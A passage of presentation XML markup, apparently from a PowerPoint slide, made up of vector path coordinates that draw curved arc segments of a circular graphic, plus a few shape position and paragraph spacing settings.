                  <a:pt x="611327" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645985" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681888" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718972" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757224" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796582" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837018" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878497" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920965" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964399" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008735" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053960" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100023" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1146873" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="226898"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2207069" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="2701874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2201634" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="242011"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2201634" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="242011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2207069" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="242011"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619781" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606611" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591651" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574925" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556497" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536393" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514650" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491321" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466429" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440025" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2412136" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382824" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352116" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2320048" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286673" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252014" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2216112" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2179028" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2140775" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2101418" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060981" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2019503" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1977034" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1933600" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1889264" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844040" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1797977" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1751126" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1703514" y="2673299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1703514" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1750479" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796745" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842274" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887016" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1930958" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1974049" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2016252" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057539" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097874" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137232" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175560" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212835" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2249030" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284082" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317991" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350693" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382164" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2412377" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441295" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468880" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495092" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519896" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543264" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565171" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585555" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604401" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621673" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637332" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651353" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2663685" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2663685" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651353" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637332" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621673" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604401" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585555" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565171" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543264" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519896" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495092" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468880" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441295" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2412377" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382164" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350693" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317991" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284082" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2249030" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212835" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175560" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137232" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097874" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057539" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2016252" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1974049" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1930958" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887016" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842274" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796745" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1750479" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1703514" y="226898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1703514" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1751126" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1797977" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844040" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1889264" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1933600" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1977034" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2019503" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060981" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2101418" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2140775" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2179028" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2216112" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252014" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286673" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2320048" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352116" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382824" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2412136" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440025" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466429" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491321" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514650" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536393" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556497" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574925" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591651" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606611" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619781" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2896832" y="1447927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2895282" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2892183" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887535" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881350" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873603" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2864320" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2853474" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841091" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827159" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2811678" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794647" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776067" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2755938" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2734259" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711043" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2686266" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2659951" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2624010" y="703783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2649220" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2672918" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2695079" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2715717" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2734830" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2752407" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768460" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782976" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795968" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807436" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2817368" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825775" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832658" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2838005" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841828" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844127" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844889" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844127" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841828" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2838005" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832658" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825775" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2817368" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807436" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795968" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782976" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768460" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2752407" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2734830" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2715717" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2695079" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2672918" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2649220" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2624010" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2659951" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2686266" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711043" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2734259" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2755938" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776067" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794647" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2811678" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827159" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841091" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2853474" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2864320" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873603" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881350" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887535" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2892183" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895282" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896832" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896832" y="1447927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997066" y="5026279"/>
            <a:ext cx="1564640" cy="694055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373380" marR="5080" indent="-361315">
              <a:lnSpc>
                <a:spcPts val="2630"/>
              </a:lnSpc>
              <a:spcBef>
